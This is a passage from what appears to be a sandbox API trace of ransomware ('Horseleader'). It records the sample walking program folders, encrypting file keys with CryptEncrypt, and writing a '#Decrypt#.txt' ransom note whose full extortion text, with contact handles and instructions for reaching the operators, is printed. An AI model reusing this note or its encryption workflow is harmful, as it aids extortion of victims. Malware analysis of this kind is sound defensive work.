maker\\shared\\dvdstyles\\rectangles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.743] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa3a577, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa3a577, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.743] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.743] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png") returned 97 [0251.743] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.743] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.743] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.743] lstrlenW (lpString=".testttjffg") returned 11 [0251.743] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.743] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.744] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.744] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.744] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa606d4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa606d4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.744] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.744] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png") returned 92 [0251.744] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.744] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.744] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.744] lstrlenW (lpString=".testttjffg") returned 11 [0251.744] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.744] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.744] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.744] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.745] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1441a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa1441a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.745] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.745] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png") returned 98 [0251.745] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.745] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.745] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.745] lstrlenW (lpString=".testttjffg") returned 11 [0251.745] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.745] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.745] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.745] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.745] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9ee2bd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f9ee2bd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.745] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.745] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png") returned 89 [0251.746] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.746] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.746] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.746] lstrlenW (lpString=".testttjffg") returned 11 [0251.746] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.746] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.746] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.746] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.746] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa3a577, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa3a577, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.746] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.746] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png") returned 95 [0251.746] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.746] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.746] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.746] lstrlenW (lpString=".testttjffg") returned 11 [0251.746] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.746] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.746] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.747] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.747] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f92fbec, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f92fbec, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef31505, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6114, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="reflect.png", cAlternateFileName="")) returned 1 [0251.747] lstrcmpiW (lpString1="reflect.png", lpString2="Windows") returned -1 [0251.747] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png") returned 70 [0251.747] StrStrIW (lpFirst="reflect.png", lpSrch=".horseleader") returned 0x0 [0251.747] lstrcmpW (lpString1="reflect.png", lpString2="#Decrypt#.txt") returned 1 [0251.747] lstrcmpW (lpString1="reflect.png", lpString2="_uninstalling_.png") returned 1 [0251.747] lstrlenW (lpString=".testttjffg") returned 11 [0251.747] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png", lpSrch=".testttjffg") returned 0x0 [0251.747] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.747] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.747] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\reflect.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.749] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f97bea6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f97bea6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef31505, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2fcdc, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="vistabg.png", cAlternateFileName="")) returned 1 [0251.749] lstrcmpiW (lpString1="vistabg.png", lpString2="Windows") returned -1 [0251.749] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png") returned 70 [0251.749] StrStrIW (lpFirst="vistabg.png", lpSrch=".horseleader") returned 0x0 [0251.749] lstrcmpW (lpString1="vistabg.png", lpString2="#Decrypt#.txt") returned 1 [0251.749] lstrcmpW (lpString1="vistabg.png", lpString2="_uninstalling_.png") returned 1 [0251.749] lstrlenW (lpString=".testttjffg") returned 11 [0251.749] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png", lpSrch=".testttjffg") returned 0x0 [0251.749] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.749] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.749] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\vistabg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.749] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f97bea6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f97bea6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef31505, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2fcdc, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="vistabg.png", cAlternateFileName="")) returned 0 [0251.749] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.750] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\#Decrypt#.txt") returned 72 [0251.750] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.752] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.752] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.754] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.754] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.754] CloseHandle (hObject=0x158) returned 1 [0251.754] GetProcessHeap () returned 0x780000 [0251.754] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.754] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea9b652, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea9b652, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee98f8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_babypink_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.754] lstrcmpiW (lpString1="rectangle_babypink_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.754] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp") returned 80 [0251.754] StrStrIW (lpFirst="rectangle_babypink_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.755] lstrcmpW (lpString1="rectangle_babypink_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.755] lstrcmpW (lpString1="rectangle_babypink_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.755] lstrlenW (lpString=".testttjffg") returned 11 [0251.755] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.755] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.755] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_babypink_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.756] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea9b652, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea9b652, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee98f8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_glass_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.756] lstrcmpiW (lpString1="rectangle_glass_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.756] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp") returned 77 [0251.756] StrStrIW (lpFirst="rectangle_glass_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.757] lstrcmpW (lpString1="rectangle_glass_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.757] lstrcmpW (lpString1="rectangle_glass_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.757] lstrlenW (lpString=".testttjffg") returned 11 [0251.757] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.757] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.757] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.757] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eac17af, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eac17af, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee98f8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_highlights_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.757] lstrcmpiW (lpString1="rectangle_highlights_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.757] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp") returned 82 [0251.758] StrStrIW (lpFirst="rectangle_highlights_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.758] lstrcmpW (lpString1="rectangle_highlights_Thumbnail.bmp", 